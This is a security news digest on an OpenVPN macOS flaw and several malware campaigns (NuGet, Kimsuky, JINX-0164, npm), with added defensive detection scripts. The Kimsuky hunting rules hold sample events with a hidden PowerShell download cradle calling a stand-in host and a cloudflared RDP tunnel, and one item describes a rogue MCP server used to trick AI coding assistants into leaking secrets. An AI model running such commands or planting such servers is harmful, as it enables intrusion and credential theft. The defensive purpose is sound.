Trending Topics

TRENDING TOPICS MAY 29, 2026

Critical OpenVPN Connect macOS Flaw Lets Local Attackers Gain Root Access

A critical vulnerability in OpenVPN Connect for macOS, tracked as CVE-2026-9560, allowed local users to gain full root privileges by abusing the app’s privileged helper component. The issue affected OpenVPN Connect versions 3.5.1 through 3.8.1, where the background helper that manages VPN connections handled local inter-process communication insecurely, so a local attacker could send crafted messages that the service would act on with root rights. With a CVSS score of 9.4, successful exploitation could give an attacker complete control over a Mac with OpenVPN Connect installed, including installing additional malware, disabling security tools, or tampering with VPN configurations. The flaw was discovered and responsibly reported by researchers Ismael Esquilichi, Pablo Redondo, and Lê Đức Ninh, and has been fixed in OpenVPN Connect version 3.8.2 for macOS. In addition to closing the privilege escalation hole, the 3.8.2 release also corrects bugs where certain trailing characters in server URLs could break web-based authentication, and where profile switching sometimes triggered blank profile imports or crashes during migration. Users and enterprises are strongly urged to upgrade to the latest version, especially in shared or managed environments where local accounts might be abused to escalate privileges and undermine the integrity of supposedly secure VPN-protected endpoints.
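For fleets that cannot simply push the update, the first question is which Macs still run an affected build. The script below is an added example, not OpenVPN's own tooling: it reads the app bundle's Info.plist, normalizes CFBundleShortVersionString into a comparable tuple, and reports whether the build falls inside the 3.5.1 through 3.8.1 range the advisory names. The default bundle path and the sample plist are assumptions for illustration.

```python
"""Fleet triage for the OpenVPN Connect macOS advisory above.

Added example, not OpenVPN's code. It reads the app bundle's Info.plist,
parses CFBundleShortVersionString, and reports whether the installed build
falls inside the affected range 3.5.1 through 3.8.1 (fixed in 3.8.2). The
default bundle path and the sample plist below are assumptions.
"""
import plistlib
import re
from pathlib import Path
from typing import Optional, Tuple, Union

DEFAULT_BUNDLE = Path("/Applications/OpenVPN Connect/OpenVPN Connect.app")  # assumed install path
AFFECTED_MIN = (3, 5, 1)
AFFECTED_MAX = (3, 8, 1)
FIXED = (3, 8, 2)

# Constructed sample plist standing in for a real bundle's Contents/Info.plist.
SAMPLE_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "example.openvpn-connect",  # placeholder, not the real bundle id
    "CFBundleShortVersionString": "3.7.0",
})


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '3.8.1', '3.8.1.1234' or '3.8.2-beta' into (major, minor, patch).

    Only the leading digits of each component count, build numbers past the
    third component are dropped, and missing components are padded with 0,
    so the result always compares correctly against the range constants.
    """
    parts = []
    for piece in text.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    if not parts:
        raise ValueError(f"unparseable version string: {text!r}")
    parts = (parts + [0, 0, 0])[:3]
    return parts[0], parts[1], parts[2]


def is_affected(version: Tuple[int, int, int]) -> bool:
    """True when the build lies in the advisory's affected range."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def version_from_plist(plist_bytes: bytes) -> Tuple[int, int, int]:
    info = plistlib.loads(plist_bytes)
    return parse_version(info["CFBundleShortVersionString"])


def triage_bundle(bundle: Union[str, Path] = DEFAULT_BUNDLE) -> Optional[dict]:
    """Return the installed version and verdict, or None when the app is absent."""
    plist = Path(bundle) / "Contents" / "Info.plist"
    if not plist.is_file():
        return None
    version = version_from_plist(plist.read_bytes())
    return {
        "version": ".".join(map(str, version)),
        "affected": is_affected(version),
        "upgrade_to": ".".join(map(str, FIXED)),
    }


if __name__ == "__main__":
    print(triage_bundle() or "OpenVPN Connect not found at the default path")
```

Run it from an MDM script or over SSH and collect the dictionary per host; a version string with a fourth build component or a pre-release suffix is the usual reason naive string comparison misclassifies hosts, which is why the parser normalizes to three integers first.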

Malicious Sicoob NuGet Package Steals Banking Credentials And Targets Cloud Secrets

A malicious NuGet package posing as a legitimate C# SDK for Brazilian banking cooperative Sicoob has been caught stealing highly sensitive authentication material from developers, turning routine API integration into a potential banking heist. Labeled Sicoob[.]Sdk and downloaded nearly 500 times, versions 2.0.0 through 2.0.4 quietly exfiltrated client IDs, PFX certificates, and PFX passwords to a hard-coded Sentry endpoint whenever developers instantiated the SicoobClient class with their production credentials. Because these PFX certificates underpin automated operations like Pix instant payments and dynamic QR code generation, any compromised material could allow attackers to impersonate a business in Sicoob’s banking network and abuse payment flows at scale. Researchers found that the package also captured raw Boleto API responses, potentially exposing transaction details, amounts, due dates, and payer or payee data that could feed downstream fraud or data leakage. To appear trustworthy, the threat actor maintained a clean GitHub repository that did not include the malicious code, while slipping the data-stealing logic only into the NuGet artifact, a classic source-to-package mismatch that exploits developers’ trust in open-source ecosystems. NuGet has since blocked Sicoob[.]Sdk and the “sicoob” publisher profile that listed 11 additional packages with around 6,000 downloads, but organizations that have ever installed the package are urged to remove it, treat all PFX material as compromised, replace certificates, rotate passwords, adjust client IDs, and review Sicoob API logs for suspicious activity. The discovery lands alongside a separate cluster of 14 malicious npm packages that typosquat popular OpenSearch, Elasticsearch, DevOps, and configuration libraries to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD secrets via preinstall hooks and a custom credential harvester.
These campaigns, together with recent waves of hundreds of npm payloads abusing postinstall scripts, dependency confusion, and ad monetization, illustrate how attackers have moved beyond simple typosquatting toward what Sonatype calls manufactured legitimacy, crafting package names, scopes, and versions that look entirely routine inside modern development workflows. For defenders, no open-source package should be implicitly trusted based on name recognition or download count alone, and securing software supply chains now demands continuous monitoring for source-to-package mismatches, credential exfiltration, and suspicious lifecycle scripts before code ever reaches production pipelines.

Kimsuky Deploys HTTPSpy And Supercharges Its Espionage Toolkit

The North Korean state-sponsored group Kimsuky, also known as Velvet Chollima or APT43, is hitting South Korean military and corporate targets with a refreshed HTTPSpy campaign that leans on fake security software sites and spoofed Webex pages to quietly hijack endpoints. In recent attacks observed through March and April 2026, the group masqueraded as installers for a South Korean B2B messaging service and a fraudulent Cisco Webex troubleshooting page, tricking victims into running JSE-based droppers that pull multi-stage payloads via PowerShell and ultimately deploy the HTTPSpy remote access trojan. HTTPSpy provides full-featured control of compromised systems, including command execution, file upload and download, screenshot capture, process injection, and self-deletion, giving Kimsuky a resilient foothold in sensitive networks. Researchers say Kimsuky has gone beyond simple malware delivery, wiring in real-time infection checks through mechanisms like JSONPing and even using stolen meeting schedules to redirect victims into legitimate Webex rooms so the lure looks authentic. The same cluster of activity shows the group expanding its arsenal by delivering multiple malware families via JSE, PIF, SCR, and EXE droppers, split broadly between the PebbleDash and AppleSeed lines. New PebbleDash-linked tools include HelloDoor, a Rust-based backdoor likely assisted by large language models, plus HttpMalice and HttpTroy, both capable of reconnaissance, command execution, in-memory payload loading, screenshot capture, reverse shells, and extensive cleanup to remove traces. On the AppleSeed side, Kimsuky is doubling down on data theft, with AppleSeed Spy variants harvesting documents, screenshots, keystrokes, USB drive listings, and especially certificates from the C:\GPKI directory, mirroring capabilities previously seen in Troll Stealer.
HappyDoor, a long-running AppleSeed offshoot first seen in 2021, remains in play and underscores the group's practice of keeping its source code and iteratively improving it over time. Kaspersky further highlights Kimsuky’s growing use of legitimate infrastructure, such as Visual Studio Code Remote Tunneling, Cloudflare Quick Tunnels, and the DWAgent remote monitoring tool, to establish covert remote access that blends into normal IT operations rather than relying solely on classic command-and-control channels. Taken together, the campaigns point to a threat actor with broad access to its original codebase, a willingness to experiment with Rust and Go tooling, and overlapping targets that span defense, military, government, medical, machinery, and energy sectors in South Korea and beyond. PebbleDash operations have already reached defense organizations in Brazil and Germany, while AppleSeed continues to focus primarily on government entities. For defenders, Kimsuky’s blend of social engineering, staged loaders, living-off-the-land tunnels, and evolving backdoors is a reminder that security teams must scrutinize even “legitimate” remote access channels, harden against script-based droppers, and closely monitor certificate stores and GPKI paths for signs of targeted exfiltration.
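The defensive advice above (script-based droppers, staged PowerShell loaders, "legitimate" tunnels, GPKI access) translates directly into hunting rules. The block below is an added example, not Kaspersky's or any vendor's detection content: it runs four such rules over constructed, Sysmon-like process-creation and file-access events. The field names, rule labels and sample events are assumptions for illustration; the tunnel rule in particular will fire on legitimate developer use of VS Code tunnels and cloudflared, which is exactly the traffic the report says needs scrutiny rather than implicit trust.

```python
"""Hunting rules for the Kimsuky tradecraft described above.

Added example, not Kaspersky's or any vendor's detection content. It runs
four rules over constructed, Sysmon-like process-creation and file-access
events: script hosts launching JSE/PIF/SCR droppers from user-writable
paths, PowerShell download cradles spawned by a script host, VS Code and
Cloudflare tunnel or DWAgent command lines, and reads of C:\\GPKI by
untrusted processes. Field names, rule labels and samples are assumptions.
"""
import re
from typing import Dict, List

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\|\\Windows\\Temp\\", re.I)
DROPPER_EXT = re.compile(r"\.(jse|pif|scr)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|-e(nc|ncodedcommand)?\b",
    re.I,
)
TUNNELS = [
    (re.compile(r"\bcode(\.exe)?\b.*\btunnel\b", re.I), "vscode-remote-tunnel"),
    (re.compile(r"\bcloudflared(\.exe)?\b.*\btunnel\b", re.I), "cloudflare-tunnel"),
    (re.compile(r"trycloudflare\.com", re.I), "cloudflare-quick-tunnel"),
    (re.compile(r"\bdwagent(\.exe)?\b", re.I), "dwagent-rmm"),
]
GPKI = re.compile(r"^[A-Z]:\\GPKI\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: Dict) -> List[str]:
    """Return the rule labels that fire for one event."""
    hits: List[str] = []
    img = basename(ev.get("image", ""))
    parent = basename(ev.get("parent_image", ""))
    cmd = ev.get("cmdline", "")
    if ev["type"] == "process":
        # Rule 1: a script host runs a JSE dropper, or a PIF/SCR file executes, from a user-writable path.
        if img in SCRIPT_HOSTS and DROPPER_EXT.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append("dropper-from-user-path")
        elif DROPPER_EXT.search(img) and USER_WRITABLE.search(ev.get("image", "")):
            hits.append("dropper-from-user-path")
        # Rule 2: PowerShell with a download/eval cradle whose parent is a script host.
        if img == "powershell.exe" and parent in SCRIPT_HOSTS and CRADLE.search(cmd):
            hits.append("powershell-cradle-from-script-host")
        # Rule 3: the "legitimate" remote-access channels the report calls out.
        for pattern, label in TUNNELS:
            if pattern.search(cmd):
                hits.append(label)
    elif ev["type"] == "file_read":
        # Rule 4: GPKI certificate material read by a script host, PowerShell, or a binary in a user-writable path.
        untrusted = img in SCRIPT_HOSTS or img == "powershell.exe" or bool(USER_WRITABLE.search(ev.get("image", "")))
        if GPKI.match(ev.get("path", "")) and untrusted:
            hits.append("gpki-read-by-untrusted-process")
    return hits


def hunt(events: List[Dict]) -> Dict[int, List[str]]:
    """Map event index -> fired rules, omitting events with no hits."""
    results: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample events (not real telemetry); the first five should fire, the last three should not.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\kim\Downloads\Webex_Troubleshooting.jse"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/s1')\""},
    {"type": "process", "image": r"C:\Users\kim\AppData\Local\Programs\Microsoft VS Code\code.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "code.exe tunnel --accept-server-license-terms"},
    {"type": "process", "image": r"C:\Users\kim\AppData\Local\Temp\cloudflared.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "cloudflared.exe tunnel --url http://localhost:3389"},
    {"type": "file_read", "image": r"C:\Users\kim\AppData\Local\Temp\svc.exe",
     "path": r"C:\GPKI\Certificate\signCert.der"},
    {"type": "file_read", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\GPKI\Certificate\signCert.der"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell Get-Process"},
    {"type": "process", "image": r"C:\Windows\System32\cscript.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
]

if __name__ == "__main__":
    for index, labels in hunt(SAMPLE_EVENTS).items():
        print(index, labels)
```

The parent-process condition in rule 2 is what keeps it quiet: PowerShell cradles spawned by explorer.exe or an admin's console are common, but one spawned by wscript.exe or cscript.exe is the dropper chain described in the report. Rule 4 deliberately allows browsers and other trusted-path binaries to read C:\GPKI, since that directory is used legitimately for Korean government PKI certificates.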

JINX-0164 Uses LinkedIn Lures To Drop Custom macOS Infostealer On Crypto Firms

A newly identified threat actor, tracked as JINX-0164, is targeting cryptocurrency organizations through fake recruiter outreach on LinkedIn, virtual meeting invites, and bespoke macOS malware to steal digital assets. Active since at least mid-2025 and motivated by financial gain, the actor targets developers and engineers, using recruitment-themed social engineering to move from a single compromised laptop into CI/CD pipelines and code distribution systems, where they can ultimately tamper with source code and siphon crypto wallet credentials. In the attack chain detailed by researchers, victims first receive messages from credible-looking LinkedIn profiles offering interviews, then are directed to a rogue domain impersonating a teleconferencing provider that prompts them to download a “meeting client.” That installer actually pulls down a bash script from a fake Apple driver store domain, which in turn downloads an architecture-aware payload masquerading as a system audio driver named coreaudiod, saved as ChromeUpdater and launched via launchctl. The payload is a Python-based macOS infostealer and remote access trojan dubbed AUDIOFIX, and once active it harvests a wide range of sensitive data including password manager entries, browser and iCloud Keychain credentials, SSH keys, console histories, cryptocurrency wallet extensions and addresses, plus live Discord, Slack and Telegram sessions, while also supporting manual reconnaissance, file exfiltration, shell command execution, and additional payload retrieval. JINX-0164 does not stop at LinkedIn lures; the group also weaponized the JavaScript ecosystem by pushing a compromised version of the @velora-dex/sdk npm package, a legitimate DeFi library, that silently installed a Go-based backdoor known as MiniRAT on macOS systems. 
MiniRAT allows attackers to upload files, run arbitrary commands, and pull extra tooling from their own servers, turning what looks like a normal development dependency into a bridgehead into crypto trading infrastructure. While aspects of the campaign, including its focus on cryptocurrency, VPN usage, and spoofed domains, resemble patterns seen in North Korean clusters such as BlueNoroff, current evidence does not show direct infrastructure overlaps, leaving JINX-0164 treated as a distinct, financially driven actor that combines social media-based phishing, macOS-specific malware, and software supply chain abuse to reach high-value crypto targets.
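The persistence step in that chain, a launchd job running a binary named like a system daemon (coreaudiod) from a user-writable location, is something a responder can sweep for across a fleet. The block below is an added example, not the actor's code or any vendor's tool: it parses LaunchAgent and LaunchDaemon property lists and flags that masquerade pattern. The sample plists, labels and paths are constructed; the text does not say whether "ChromeUpdater" was the job label or the file name, so the sample uses it as the label.

```python
"""launchd persistence triage for the JINX-0164 chain described above.

Added example, not the actor's code or any vendor's tooling. It parses
LaunchAgent/LaunchDaemon property lists and flags the reported pattern: a job
whose executable borrows a system daemon's name (coreaudiod) but lives in a
user-writable location. The sample plists, labels and paths are constructed.
"""
import plistlib
from pathlib import Path
from typing import Dict, List

# Paths a user-level attacker cannot normally write to. /Library and /Applications
# are admin-writable, so they count as "trusted" only for triaging user-level persistence.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/", "/Applications/")
# Real macOS daemon/process names an implant might borrow (compared case-insensitively).
SYSTEM_DAEMON_NAMES = {"coreaudiod", "launchd", "kernel_task", "windowserver", "syslogd",
                       "securityd", "mds", "cfprefsd", "loginwindow", "trustd", "notifyd"}
SEARCH_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"]


def program_path(job: Dict) -> str:
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    if "Program" in job:
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_job(job: Dict) -> Dict:
    """Score one launchd job dictionary."""
    prog = program_path(job)
    name = Path(prog).name.lower()
    findings: List[str] = []
    untrusted = bool(prog) and not prog.startswith(TRUSTED_PREFIXES)
    if untrusted:
        findings.append("program-outside-trusted-paths")
    if name in SYSTEM_DAEMON_NAMES and untrusted:
        findings.append("system-daemon-name-outside-system-path")
    if job.get("RunAtLoad") and (job.get("KeepAlive") or job.get("StartInterval")):
        findings.append("auto-start-with-keepalive")
    label = str(job.get("Label", ""))
    if "." not in label:  # Apple and most vendors use reverse-DNS labels
        findings.append("non-reverse-dns-label")
    return {"label": label, "program": prog, "findings": findings,
            "masquerade": "system-daemon-name-outside-system-path" in findings}


def triage_plist(data: bytes) -> Dict:
    return triage_job(plistlib.loads(data))


def scan(dirs: List[str] = SEARCH_DIRS) -> List[Dict]:
    """Triage every plist under the given launchd directories (for real hosts)."""
    results = []
    for d in dirs:
        for p in Path(d).expanduser().glob("*.plist"):
            try:
                results.append({"file": str(p), **triage_plist(p.read_bytes())})
            except Exception as exc:  # unreadable or malformed plist
                results.append({"file": str(p), "error": str(exc)})
    return results


# Constructed samples: the described implant, a legitimate-looking third-party updater, and an Apple-style job.
SAMPLE_IMPLANT = plistlib.dumps({
    "Label": "ChromeUpdater",
    "ProgramArguments": ["/Users/dev/Library/Application Support/ChromeUpdater/coreaudiod"],
    "RunAtLoad": True, "KeepAlive": True,
})
SAMPLE_UPDATER = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Users/dev/Library/Application Support/ExampleUpdater/updater", "--check"],
    "RunAtLoad": True, "StartInterval": 3600,
})
SAMPLE_APPLE = plistlib.dumps({
    "Label": "com.apple.example",
    "Program": "/usr/libexec/example",
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for r in scan():
        if r.get("masquerade"):
            print("MASQUERADE", r["file"], r["program"])
```

A third-party updater in ~/Library/Application Support will also trip the "outside trusted paths" finding, so the verdict worth paging on is the combination: a system-daemon name and an untrusted path together. Pair this with a code-signature check of the flagged binary before deciding; a real coreaudiod ships signed by Apple under /usr/sbin.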

Typosquatted npm Packages Used To Steal Cloud and CI/CD Secrets

Security researchers have uncovered a live supply chain campaign in which a single threat actor published dozens of typosquatted npm packages that quietly steal cloud and CI/CD credentials from developer environments and build pipelines. The malicious packages closely mimic popular OpenSearch, Elasticsearch, configuration, and DevOps libraries, then use preinstall scripts and custom infostealer code to harvest AWS, Azure, and GCP credentials, HashiCorp Vault tokens, npm tokens, and other environment secrets before exfiltrating them to attacker-controlled infrastructure. Once in possession of these secrets, the attacker can pivot into CI workflows, cloud accounts, and private repositories, where they can tamper with code, implant backdoors, or abuse cloud resources. This campaign follows a broader pattern of npm supply chain abuse that includes worm-like malware, which spreads by using stolen tokens to inject malicious dependencies into additional repositories and GitHub Actions workflows, effectively turning compromised developers and projects into new propagation points. In some variants, researchers even observed modules that tamper with local configurations for AI coding assistants by inserting a rogue Model Context Protocol server designed to trick tools into exfiltrating sensitive local files and secrets. The incident underscores how typosquatting is evolving from simple lookalike naming into complex multi-stage operations that blend credential theft, CI takeover, and AI toolchain manipulation, and it reinforces the need for organizations to enforce strict dependency policies, monitor for suspicious lifecycle scripts, and treat any newly published or unfamiliar npm package as high risk until proven otherwise.
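Two of the controls this item and the Sicoob story above both call for, checking for source-to-package mismatches and watching install-time lifecycle scripts, can be automated before a package reaches a build agent. The block below is an added example, not Sonatype's or any registry's tooling: it compares the file set of a published npm tarball against a git checkout by content hash and lists the install hooks the manifest declares. The package name, file contents and source tree are constructed. For a compiled NuGet assembly like the Sicoob case the same comparison needs a decompiled or reproducible build on the source side, since a .dll cannot be diffed against C# files directly.

```python
"""Source-to-package mismatch and lifecycle-script audit for npm packages.

Added example, not Sonatype's or any registry's tooling. It compares the
file set of a published npm tarball against a git checkout by content hash
and lists install-time lifecycle hooks. The package name, file contents and
source tree below are constructed for illustration.
"""
import hashlib
import io
import json
import tarfile
from typing import Dict

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "preuninstall", "postuninstall")


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_tarball(files: Dict[str, bytes]) -> bytes:
    """Build an npm-style .tgz (entries under package/) in memory; used for the sample."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo("package/" + name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def read_tarball(data: bytes) -> Dict[str, bytes]:
    """Read file entries under package/, skipping anything that escapes that prefix."""
    out: Dict[str, bytes] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            name = member.name[2:] if member.name.startswith("./") else member.name
            if not member.isfile() or not name.startswith("package/") or ".." in name.split("/"):
                continue
            out[name[len("package/"):]] = tar.extractfile(member).read()
    return out


def lifecycle_hooks(package_files: Dict[str, bytes]) -> Dict[str, str]:
    """Install-time hooks declared in the published manifest (these run on `npm install`)."""
    manifest = json.loads(package_files.get("package.json", b"{}"))
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def audit(package_files: Dict[str, bytes], source_files: Dict[str, bytes]) -> Dict:
    """Diff the published artifact against source and surface install hooks."""
    pkg_hashes = {n: sha256(c) for n, c in package_files.items()}
    src_hashes = {n: sha256(c) for n, c in source_files.items()}
    return {
        "lifecycle_hooks": lifecycle_hooks(package_files),
        "only_in_package": sorted(n for n in pkg_hashes if n not in src_hashes),
        "modified": sorted(n for n in pkg_hashes if n in src_hashes and pkg_hashes[n] != src_hashes[n]),
        "only_in_source": sorted(n for n in src_hashes if n not in pkg_hashes),
    }


# Constructed sample: what the public repo contains versus what was published to the registry.
SOURCE_TREE = {
    "package.json": json.dumps({"name": "example-search-config", "version": "1.4.2", "main": "index.js"}).encode(),
    "index.js": b"module.exports = { load: () => require('./config.json') };\n",
}
PUBLISHED_TARBALL = build_tarball({
    "package.json": json.dumps({"name": "example-search-config", "version": "1.4.2", "main": "index.js",
                                "scripts": {"preinstall": "node setup.js"}}).encode(),
    "index.js": SOURCE_TREE["index.js"],
    "setup.js": b"/* constructed stand-in for a credential harvester */\n",
})


def audit_sample() -> Dict:
    return audit(read_tarball(PUBLISHED_TARBALL), SOURCE_TREE)


if __name__ == "__main__":
    print(json.dumps(audit_sample(), indent=2))
```

In practice fetch the tarball with `npm pack <name>@<version>` and the source at the tag the package claims to be built from; files listed under only_in_source are usually harmless (README, tests, CI config excluded by the files field or .npmignore), while anything under only_in_package or modified, and any install hook at all, deserves a human look before the package is allowed into a pipeline.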

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics.

Written By: William Elchert
